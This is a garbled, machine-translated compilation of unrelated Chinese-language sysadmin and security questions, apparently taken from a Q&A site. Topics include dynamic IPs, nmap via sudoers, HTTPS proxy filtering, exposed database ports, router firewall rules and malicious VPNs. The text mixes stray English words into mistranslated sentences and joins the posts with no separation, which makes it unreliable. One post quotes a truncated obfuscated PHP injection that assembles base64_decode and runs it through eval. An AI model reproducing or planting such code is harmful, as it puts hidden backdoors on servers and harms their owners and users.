我的公司正在尝试注册LexisNexis服务。 LexisNexis(或更具体地说是由LexisNexis提供的服务)将login限制为less数IP或一系列IP。 我们只有一个相当基本的业务DSL连接,给我们一个dynamic的IP。 显然,每当我们的IP变化,我们都会失去LexisNexis服务。 我曾多次给AT&T的技术支持打电话,希望能找出我们可能分配的IP范围。 大部分我通过电话的人都是无能为力的(在向第一个人解释了我的问题之后,她说:“哦,你的意思就像无线互联网?”)。 我跟他谈的那两个人实际上知道的很多,他们告诉我他们不能也不会给我这些信息。 LexisNexis拒绝放松他们的安全要求,并告诉我必须find适用的范围或购买静态IP。 不幸的是,AT&T最便宜的静态IP包大概是每月75美元左右,我们绝对买不起。 我应该在这里做什么? 我提供AT&T的错误信息吗? 他们真的有可能给我一个范围,或者我应该寻找解决scheme吗? 这项服务对我们做生意至关重要。
在我们的大学,我们在“networking实验室”有一些电脑,它们被configuration为允许每个人通过/ etc / sudoers以root身份运行nmap。 这可能是一个安全漏洞吗?
出于某种原因,我认为这是Ubuntu的安全function。 有什么安全相关的吗?
由于我对HTTPS的知识有限,我开始思考:代理服务器如何过滤HTTPS网站? 我的意思是添加一个代理服务器本质上是一个中间人攻击,这是什么HTTPS明确应该防止 我能想到的唯一方法是通过IP和端口来阻止服务器。 然而,像SNI和通配符证书,这意味着你可以阻止合法的内容(假设一个必须被阻止的站点与一个必须在这种情况下必须可用的站点共享一个IP)。 那它做了什么? 自encryption以来,您无法读取连接的内容; 所有你知道的是,有人很可能发送一个HTTPS请求到某个IP地址。
我有两个专用服务器。 一个存储所有文件(脚本)和其他主机只是数据库。 为了连接到另一台服务器,我启用了TCP / IP上的端口2335,并将其添加到防火墙(不包括)。 现在我想知道我的服务器是否容易受到黑客的攻击。 我正在使用MS Server 2008和MS Sql Server 2008。 你能告诉我他人如何滥用这个港口吗?
我想有我自己的远程服务器,并通过SSH连接到它。 但是我想通过很多电脑(即许多不同的IP)来做到这一点,你有任何build议/安全的解决scheme吗?
我使用Vesta和PHP运行Ubuntu 12.04 x64 VPS。 它被注入了几次,如下所示: <?php $KoDgalxVvsZfidVcEOTJDeMX='ba'.'se6'.'4_deco'.'de';eval($KoDgalxVvsZfidVcEOTJDeMX("cHJlZ19yZXBsYWNlKCIvN0xna0xnND1IR2JEOGs2WDht…. 为了解决这个问题,我决定把所有文件的权限和所有者更改为555和root,所以没有用户可以更改这些文件。 我删除了FTP访问并保护了SSH,因此只有VPS中的密钥才能连接。 尽pipe进行了所有这些更改,但其他用户始终能够更改文件,重命名文件夹并上传另一个被黑客入侵的文件。 你觉得我错过了什么? 任何build议? 谢谢! 如果您需要了解更多关于这个问题的信息,我会很乐意分享,帮助其他同样患上邪恶的人!
我只是build立一个连接到互联网的家庭无线networking。 路由器具有configuration防火墙规则的设置。 目前它被设置为INBOUND ALL ANY和OUTBOUND ALL ANY。 我应该设置什么样的规则(如果有的话)来减less妥协的风险? 连接的笔记本电脑是Vista和XP。 我们只有简单的浏览需求,所以我可以打开以下入站端口? 80 HTTP 21 FTP 443 HTTPS 这仅仅是正常的网页浏览吗? 我应该设置任何出站规则吗? 不期望使用POP或SMTP
我的意思是端口连接..就像SSH端口,Nginx端口等 我不清楚港口。 到目前为止,我可以看到端口运行不超过5个字符(端口xxxxx)。 那么,在select端口号时,端口的规则和字符限制是什么? 最多5个字符? 谢谢。
我连接到已知是恶意的VPN。 networking上的众多机器(包括VPN服务器)本身都受到影响。 我应该采取什么预防措施来保护自己?